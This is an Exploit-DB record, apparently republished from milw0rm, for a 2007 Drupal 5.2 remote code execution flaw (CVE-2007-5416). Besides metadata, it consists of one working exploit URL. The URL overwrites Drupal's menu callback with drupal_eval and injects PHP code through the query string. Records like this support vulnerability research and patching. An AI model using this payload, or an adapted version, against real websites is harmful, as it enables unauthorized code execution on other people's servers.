Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

2007-10-10T00:00:00
ID EDB-ID:4510
Type exploitdb
Reporter ShAnKaR
Modified 2007-10-10T00:00:00

Description

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector. CVE-2007-5416. Webapps exploit for php platform

                                        
                                            Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/&lt;?phpinfo();

# milw0rm.com [2007-10-10]